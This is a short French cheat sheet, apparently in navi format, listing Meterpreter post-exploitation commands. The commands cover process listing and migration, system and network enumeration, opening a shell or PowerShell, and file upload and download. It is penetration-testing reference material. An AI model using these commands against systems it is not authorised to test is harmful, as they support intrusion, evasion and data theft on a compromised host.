% meterpreter, help, cmd

# Lister les processus
run <ACTION_CMD> ps

# Migration d'une instance serveur vers un autre processus => migrate <PID>
run <ACTION_CMD> migrate <PID>

# Tuer un processus
run <ACTION_CMD> kill <PID>

# Obtenir l'utilisateur actuel
run <ACTION_CMD> getuid

# Obtenir des informations sur le système
run <ACTION_CMD> sysinfo

# Obtenir la liste de routage
run <ACTION_CMD> route

# Lister les interfaces réseaux et leurs configurations
run <ACTION_CMD> ipconfig

# Obtenir le shell
run <ACTION_CMD> shell

# Charger le module powershell
run <ACTION_CMD> load powershell

# Démarrer powershell
run <ACTION_CMD> powershell_shell

# Upload/Download fichier
run <ACTION_CMD> upload/download <FILE> <FILE_OUTPUT>

$ FILE: ls
$ ACTION_CMD: echo "exec,view" | tr ',' '\n'
